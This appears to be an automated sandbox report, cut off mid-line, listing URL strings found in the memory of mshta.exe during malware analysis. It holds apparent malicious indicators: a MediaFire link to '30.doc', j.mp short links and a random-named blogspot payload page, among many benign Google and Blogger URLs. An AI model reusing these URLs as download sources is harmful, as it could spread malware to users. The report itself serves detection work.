Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500891130.0000000005619000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blog
Source: mshta.exe, 00000010.00000002.501168449.00000000056BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?service=blogger&continue=https://www.blogger.com/blogge
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/div
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com/ogspot.
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://ads.google.com/home/?subid=ww-ww-et-g-aw-a-vasquette_ads_cons_1
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483617923.0000000005AE5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.485867310.0000000002AB0000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com/js/plusone.js
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://artsandculture.google.com/?hl=de&utm_source=ogs.google.com&utm_medium=referral
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://books.google.co.uk/?hl=de&tab=jp
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=jc
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmpString found in binary or memory: https://csi.gstatic.com/csi
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/blogger-tech
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/forms/?usp=forms_alc
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=slides_alc
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=sheets_alc
Source: mshta.exe, 00000005.00000002.441579663.0000000003A07000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440369877.0000000003A07000.00000004.00000001.sdmpString found in binary or memory: https://download1370.mediafire.com/
Source: mshta.exe, 00000005.00000003.439738896.0000000000423000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441065797.0000000000423000.00000004.00000020.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc
Source: mshta.exe, 00000005.00000002.441059756.0000000000413000.00000004.00000020.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc...
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docC:
Source: mshta.exe, 00000005.00000002.443517069.0000000006E80000.00000004.00000040.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docFKWWSV
Source: mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.docPV
Source: mshta.exe, 00000005.00000003.438980428.0000000002BC5000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.438821906.0000000002BC5000.00000004.00000001.sdmpString found in binary or memory: https://download1370.mediafire.com/k67dpqw5qwtg/o7mbmqzedgahqhw/30.dochttps://download1370.mediafire
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?tab=jo
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://duo.google.com/?usp=duo_ald
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://earth.google.com/web/
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/A
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/cap-
Source: mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496794465.000000000026D000.00000004.00000020.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484351334.0000000005626000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484481957.00000000033D7000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?lang=de&family=Product
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/iv
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/rder-r
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://i18n-cloud.appspot.com
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmpString found in binary or memory: https://j.mp/L
Source: mshta.exe, 00000005.00000003.439711063.00000000003F3000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.439743604.000000000042B000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441070909.000000000042B000.00000004.00000020.sdmp, mshta.exe, 00000005.00000002.440986147.000000000039E000.00000004.00000020.sdmpString found in binary or memory: https://j.mp/ODOASODOccomplermxjdajse
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmpString found in binary or memory: https://j.mp/com
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://jamboard.google.com/?usp=jam_ald
Source: mshta.exe, 00000010.00000003.483563430.0000000000441000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.497299815.0000000000465000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495605178.0000000000465000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.coC109
Source: mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/.
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494890776.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501500466.0000000005AE8000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/favicon.ico
Source: mshta.exe, 00000010.00000003.483563430.0000000000441000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.497299815.0000000000465000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495605178.0000000000465000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/post
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483563430.0000000000441000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488412884.0000000002ACF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495294389.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488324679.0000000002ACB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484623125.0000000005549000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.497299815.0000000000465000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.487928492.0000000002AC8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495605178.0000000000465000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488398920.0000000002ACD000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488337884.0000000002ACC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500649887.00000000055DB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500262076.000000000554A000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488290964.0000000002AC9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/posts/default
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/posts/default?alt
Source: mshta.exe, 00000010.00000003.488412884.0000000002ACF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488324679.0000000002ACB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.487928492.0000000002AC8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488398920.0000000002ACD000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498382454.00000000033B7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488337884.0000000002ACC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495159129.00000000033B6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.488290964.0000000002AC9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483590836.0000000005AEB000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/posts/default?alt=rss
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/feeds/posts/defaultv
Source: mshta.exe, 00000010.00000003.484772166.00000000055A5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494957819.00000000055A5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500488420.00000000055A5000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/
Source: mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html
Source: mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog&bpli=1&followup=https://www.blogger.com/
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blogY
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.html...
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.htmlggC:
Source: mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/p/30.htmliC:
Source: mshta.exe, 00000010.00000003.495222019.00000000055E5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494890776.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501500466.0000000005AE8000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/search
Source: mshta.exe, 00000010.00000003.485867310.0000000002AB0000.00000004.00000001.sdmpString found in binary or memory: https://kdaoskdokaodkwldld.blogspot.com/searchhttps://kdaoskdokaodkwldld.blogspot.com/
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://keep.google.com/
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://photos.google.com/?tab=jq&pageId=none
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://podcasts.google.com/
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501103190.00000000056AF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/1.1
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501103190.00000000056AF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/45
Source: mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498142531.0000000003304000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000002.500836105.000000000560D000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png)
Source: mshta.exe, 00000010.00000002.498142531.0000000003304000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png.NET4.0E)2
Source: mshta.exe, 00000010.00000002.500649887.00000000055DB000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png0%2C009%2C0
Source: mshta.exe, 00000010.00000002.498142531.0000000003304000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.pngli=10E)
Source: mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
Source: mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png)
Source: mshta.exe, 00000010.00000002.501168449.00000000056BB000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.pngight.pngt.com%2Fp%2F30.ht
Source: mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_ltr.gif)
Source: mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/triangle_open.gif
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500891130.0000000005619000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/icon_contactform_cross.gif
Source: mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_bottom.png)
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png
Source: mshta.exe, 00000010.00000002.496959119.00000000002D9000.00000004.00000020.sdmp, mshta.exe, 00000010.00000003.484913988.00000000002D9000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/img/widgets/s_top.png)
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/oss-Column
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://resources.blogblog.com/px
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://s.ytimg.com
Source: mshta.exe, 00000005.00000003.440330066.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000005.00000003.440300722.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441540511.00000000039C0000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.441556317.00000000039DE000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484554877.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498267223.0000000003365000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484877129.0000000000295000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.495126051.0000000003344000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496872387.0000000000295000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://stadia.google.com/
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmpString found in binary or memory: https://translate.google.co.uk/?hl=de&tab=jT
Source: mshta.exe, 00000010.00000003.483859380.0000000005642000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/intent/tweet?text=
Source: mshta.exe, 00000010.00000002.498179973.000000000331E000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501276074.00000000056CF000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogblog.com;
Source: mshta.exe, 00000010.00000003.457364588.000000000565F000.00000004.00000001.sdmpString found in binary or memory: https://www.bloggeefD.
Source: mshta.exe, 00000010.00000003.484384718.00000000055E1000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494890776.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484511448.00000000033A7000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.501500466.0000000005AE8000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com%2C0
Source: mshta.exe, 00000010.00000003.484784407.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500538246.00000000055B9000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.494969848.00000000055B9000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/-
Source: mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.500798606.0000000005604000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/1%2
Source: mshta.exe, 00000010.00000003.484411101.00000000056CC000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.483920042.00000000055F3000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 00000010.00000003.484598287.0000000003392000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498339978.0000000003392000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/Q
Source: mshta.exe, 00000010.00000003.483887721.0000000005695000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484089234.00000000056A6000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484129061.00000000056B4000.00000004.00000001.sdmp, mshta.exe, 00000010.00000003.484465965.00000000033BB000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.498393507.00000000033BC000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/age-verification.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.
Source: mshta.exe, 00000010.00000003.457364588.000000000565F000.00000004.00000001.sdmpString found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26t
Source: mshta.exe, 00000010.00000002.500488420.00000000055A5000.00000004.00000001.sdmp, mshta.exe, 00000010.00000002.496794465.0000000